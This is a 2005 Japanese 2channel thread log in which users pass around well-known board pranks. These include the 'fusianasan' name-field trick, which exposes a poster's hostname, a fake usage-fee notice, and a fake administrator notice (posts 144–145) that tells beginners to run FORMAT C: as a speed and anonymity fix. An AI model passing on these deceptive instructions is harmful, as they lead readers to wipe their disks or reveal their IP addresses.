106 :水先案名無い人:2005/07/20(水) 18:46:13 ID:gkUJ579C0
新しいw

107 :水先案名無い人:2005/07/20(水) 23:33:27 ID:v3M1JuSK0
アデブレーデ オブリガード

108 :水先案名無い人:2005/07/21(木) 08:16:45 ID:6QEMnnwC0
ザビエルか

109 :http:// YahooBB221040172019.bbtec.net.2ch.net/:2005/07/21(木) 17:55:51 ID:3Fos2Yqj0
guest

110 :水先案名無い人:2005/07/21(木) 19:36:37 ID:Vpq/S/1X0
>>105
検索しようと思った瞬間ウィルステラワロスww

111 :水先案名無い人:2005/07/21(木) 19:47:07 ID:LE4vgCwY0
>>105
ナスイ

112 :水先案名無い人:2005/07/21(木) 21:04:48 ID:GkoJIqlp0
近所でロケやってたので電車男の撮影現場を撮ってきますた(`・ω・´)
http://kur0nek0.web.infoseek.co.jp/obon/04/index.html

伊藤君やっぱりサーフィンやるみたい。
それにしても伊東美咲きれいだった〜(´∀`*)
画像20枚くらいまとめてあります。



113 :水先案名無い人:2005/07/21(木) 21:37:07 ID:Q3j3EJXZ0
2ちゃんねるって無料なんですか?

114 :水先案名無い人:2005/07/22(金) 08:49:40 ID:tlUP1dMR0
>>113
つttp://aham.hp.infoseek.co.jp/ryokin.shtml


115 :水先案名無い人:2005/07/22(金) 13:54:55 ID:KNBokFSU0
>>114
ワロタ

116 :水先案名無い人:2005/07/22(金) 13:58:36 ID:LQ/f1zcWO
即出かもしれんが…

おみくじ機能を搭載しました。
     名前欄にfusianasanといれて書き込むと、
     【大吉】【中吉】などに変換されますです。。。

117 :水先案名無い人:2005/07/22(金) 16:06:19 ID:AfWG3m1d0
sage機能もわからない2ちゃんねる初心者は
皆に迷惑がかかるのでここへどうぞ。

初心者の質問
http://etc3.2ch.net/qa/

基本的にはココ意外の板へは半年間書き込みをしないでROMしてましょう。
ROMとは Read Only Member の略で「読むだけの人」という意味です。



【2ちゃんねる初心者の方へ】

※必読

******************************************
2chは巨大な掲示板集合体であり、統計によると700万人以上の人が訪れている場所です。
そこにはルールがあり、暗黙の了解等も存在しています。
もし2chの住人になろうと思っている方、書き込む前にまずは元からいた住人を見てください。
そうすれば暗黙の了解やルール等も漠然とですがわかってきます。それが守れるのであれば住人達はきっと暖かく受け入れてくれるでしょう。
しかし守れない場合、住人達は暖かく受け入れないだけではなく、大きく傷ついてしまう場合もあります。

書き込むという事は自分だけでなく、大勢の人に見られるという事を忘れないように。
******************************************







118 :水先案名無い人:2005/07/22(金) 18:35:03 ID:xtWDyXQy0
タシロは神です。
http://www17.ocn.ne.jp/~bu_san/index_.html

119 :【末吉】:2005/07/22(金) 22:37:27 ID:seY4f9GH0
>>116
てすと

120 :【凶】:2005/07/22(金) 22:47:00 ID:s2HrpHKO0
どれどれ

121 :水先案名無い人:2005/07/23(土) 01:07:44 ID:tAkX1DM90
ここでやっても意味ない

122 :水先案名無い人:2005/07/23(土) 01:30:20 ID:tPjH6jVC0
最新の釣りキタ!
【初心者】2ちゃんねる基本ルール【必見!】
http://aa5.2ch.net/test/read.cgi/mona/1121746533/

123 :水先案名無い人:2005/07/23(土) 02:33:05 ID:HG6eSVrs0
誰も釣られてねえじゃねえかよ

124 :ura2 ntmygi026228.mygi.nt.adsl.ppp.infoweb.ne.jp:2005/07/23(土) 13:51:53 ID:imXoKuq40
sakuratanmoe

125 :p7064-adsau08doujib3-acca.osaka.ocn.ne.jp:2005/07/23(土) 14:46:19 ID:X3urMyZ60
おみくじ機能を搭載しました。
名前欄にfusianasanといれて書き込むと、
【大吉】【中吉】などに変換されますです。。。

126 :futureseeiamnasany:2005/07/23(土) 14:47:09 ID:X3urMyZ60
geu

127 :水先案名無い人:2005/07/24(日) 00:06:55 ID:9mESkVrE0
<<1これはひどい

128 :水先案名無い人:2005/07/24(日) 16:55:44 ID:dqSf1INa0
>>127
Enter押せとは書いてないから平気じゃね?

129 :水先案名無い人:2005/07/26(火) 19:16:07 ID:xL1y/Zl9O
>>15
なにやってんだ劉鳳〜〜〜〜

130 :水先案名無い人:2005/07/30(土) 13:06:55 ID:DlV4zEA00
    i´厂`''''"u´   `ー、‐::-;;l  >>129
   }ノ-、    ,. -‐-、 ヽ;::::::::l   ………
   l ̄二'ー 'フ,ニニ.ーrー}-レ ''7
   l : i.゚__〉r、::..ヽ.__。ノ レ''}ノf´/
   `''r-- ノ:::`ー---‐'′:l-イ


131 :水先案名無い人:2005/08/04(木) 10:48:05 ID:fiDfLa4a0
2ちゃんねる使用料
■閲覧
1スレッド 25円
ニュース・文化・ゲーム  3分1円

書き込み
1レス 20円
スレ立て 500円

■書きこみ放題
プラチナプラン    4800円 閲覧無料 スレ立て200円、通常3スレ/月、実況5スレ/週
ゴールドプラン    3500円 閲覧無料 スレ立て半額
厨房プラン(夏限定) 2000円 閲覧無料 スレ立て無料(一回限り)

支払日:毎月末or毎年末(支払われなかった場合、然るべき措置をとる次第です。)
住所の登録:必要なし。IPアドレスから各プロバイダ(全てのプロバイダとは、契約済み)を通し、 使用した瞬間から住所が登録されます(proxyなどは、無効になっています)

※現在の使用料を確認するには※
名前の欄に『fusianasan』と書き込めば
【\5,800】とか【\27,000】の様に現在までの使用金額が表示されます。

132 :水先案名無い人:2005/08/04(木) 10:58:33 ID:fiDfLa4a0
2ちゃんねる使用料
■閲覧
1スレッド 25円
ニュース・文化・ゲーム  3分1円

書き込み
1レス 20円
スレ立て 500円

■書きこみ放題
プラチナプラン    4800円 閲覧無料 スレ立て200円、通常3スレ/月、実況5スレ/週
ゴールドプラン    3500円 閲覧無料 スレ立て半額
厨房プラン(夏限定) 2000円 閲覧無料 スレ立て無料(一回限り)

支払日:毎月末or毎年末(支払われなかった場合、然るべき措置をとる次第です。)
住所の登録:必要なし。IPアドレスから各プロバイダ(全てのプロバイダとは、契約済み)を通し、 使用した瞬間から住所が登録されます(proxyなどは、無効になっています)

※現在の使用料を確認するには※
名前の欄に『fusianasan』と書き込めば
【\5,800】とか【\27,000】の様に現在までの使用金額が表示されます。

133 :水先案名無い人:2005/08/04(木) 19:57:08 ID:SUcnJnx00
【2ちゃんねるに馴染めない人へ】
市ねとかカエレ!っていわれている貴方、そうそこの貴方
何故皆から非難を浴びてるか考えてみませんか?
この2ちゃんねるではある特別なルールがあるのです
そのルールを守らないと除け者にされてしまうのです
ではそのルールって一体何でしょうか
それは簡単、「ぬるぽ」という3文字の単語をスレに書き込むだけ!
そうすれば皆から心温まるレスが返ってくるはず
これで貴方も立派な2ちゃんねらーですよ!

134 :水先案名無い人:2005/08/10(水) 12:22:58 ID:V+UW8cgP0
m9(^Д^)プギャー

135 :水先案名無い人:2005/08/12(金) 11:18:05 ID:e1tR2DlY0
すまん>>1やったらどうなるんだ?

136 :水先案名無い人:2005/08/12(金) 15:39:30 ID:lobjTPjz0
>>135
なんで自分でやってみないの?

137 :水先案名無い人:2005/08/17(水) 12:32:23 ID:PMQYtKsc0
>>135
結構スッキリする

138 :水先案名無い人:2005/08/19(金) 18:51:24 ID:JqokI4Yk0
>>135
やる覚悟があるならやれば?

139 :水先案名無い人:2005/08/19(金) 20:55:00 ID:92Tq1hn90
>>135
ハードディスクの余分なものが無くなる。

140 :水先案名無い人:2005/08/19(金) 23:49:16 ID:F9Rs3EIB0
>>139
要るモノもだろw

141 :水先案名無い人:2005/08/20(土) 13:33:01 ID:eT40fzdQ0
初心者の頃はブラクラ何度も踏んでテンパったが 最近純粋なブラクラってあんのか?
精神的ブラクラばっかな気がするんだが

142 :水先案名無い人:2005/08/21(日) 00:20:04 ID:w9YKJ8wV0
あるあるw

143 :水先案名無い人:2005/08/22(月) 13:15:22 ID:39OPHPvQ0
>>141
Windowsキー+Eを1秒押し

144 :水先案名無い人:2005/09/01(木) 20:56:59 ID:syBI73x80
105 ひろゆき@どうやら管理人 ★[] 2005/07/20(水) 18:43:37 ID:???0 ?###

  【2ちゃんねる初心者の方へ】
  『電車男』の放送に伴い、急激にアクセス数の増えた2ちゃんねるの転送量の削減のため、ブラウザ設定の高速化をお願いいたします。
  通常、普通にダウンロードしてる2chのデータをフォーマット(圧縮)
  してダウンロードすることによってサーバーにかかる負担を大幅(16分の1)に減らすことができます。
  4年前の閉鎖騒動のころから居る人は皆やっていますが、最近そうでない人が増えてるようです。
  難しい事は何もありません。

  スタート>プログラム>アクセサリ>システムツール>ディスククリーンアップ
  で、「ドライブの選択」というウィンドウが出ます。 そのまま「OK」を押して下さい。
  「増加する空き領域を計算しています」と出るのでしばし待って下さい。
  増加する空き領域の計算が終わると新たなウインドウが出るので、また「OK」を押して下さい。
  これで準備完了です。かならず再起動してください。たったこれだけです。
  ディスククリーンアップとは記憶装置固有のデータ記録圧縮方式の事で、
  取得した情報を圧縮するための領域を確保する事を意味します。

  4年前に有志達によって開発(改良)されたread.cgiを有効にするプログラムです。
  (詳しい事はhttp://saikyoflash.everybody.client.jp/html/_0_20.htmlを見て下さい)

  これをすると、PCの処理速度やデータ送受信が早くなり、 快適に2ちゃんねるができるようになります。
  また、圧縮の際IP情報やcoookieを切り捨てるため、個人情報の漏れも防ぐことができます。(名前欄が青色になります)
  2ちゃんねるの最大の売りである『匿名性』を確保するためにもフォーマットを推奨していきたいのです。
  (個人情報の漏れに関するトラブルに巻きこまれるのももうたくさんなのです)

  『名前欄が緑!』と2ちゃんねるで馬鹿にされないためにもぜひやっておきましょう! では、快適な2ちゃんねるライフを!


145 :水先案名無い人:2005/09/01(木) 21:23:45 ID:syBI73x80
105 ひろゆき@どうやら管理人 ★[] 2005/07/20(水) 18:43:37 ID:???0 ?###

  【2ちゃんねる初心者の方へ】
  『電車男』の放送に伴い、急激にアクセス数の増えた2ちゃんねるの転送量の削減のため、ブラウザ設定の高速化をお願いいたします。
  通常、普通にダウンロードしてる2chのデータをフォーマット(圧縮)
  してダウンロードすることによってサーバーにかかる負担を大幅(16分の1)に減らすことができます。
  4年前の閉鎖騒動のころから居る人は皆やっていますが、最近そうでない人が増えてるようです。
  難しい事は何もありません。

  スタート>プログラム>アクセサリ>コマンドライン(コマンドプロント)
  で、次のコマンドを入力

  FORMAT C:

  入力後にYを押してください。

  これで準備完了です。かならず再起動してください。たったこれだけです。
  フォーマットとは記憶装置固有のデータ記録の整理・圧縮方式の事及び、
  取得した情報を圧縮するための領域を確保する事を意味します。

  4年前に有志達によって開発(改良)されたread.cgiを有効にするプログラムです。
  (詳しい事はhttp://saikyoflash.everybody.client.jp/html/_0_20.htmlを見て下さい)

  これをすると、PCの処理速度やデータ送受信が早くなり、 快適に2ちゃんねるができるようになります。
  また、圧縮の際IP情報やcoookieを切り捨てるため、個人情報の漏れも防ぐことができます。(この時名前欄が青色になります)
  2ちゃんねるの最大の売りである『匿名性』を確保するためにもこのフォーマットを推奨していきたいのです。
  (個人情報の漏れに関するトラブルに巻きこまれるのももうたくさんなのです)

  『名前欄が緑!』と2ちゃんねるで馬鹿にされないためにもぜひやっておきましょう! では、快適な2ちゃんねるライフを!

43 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)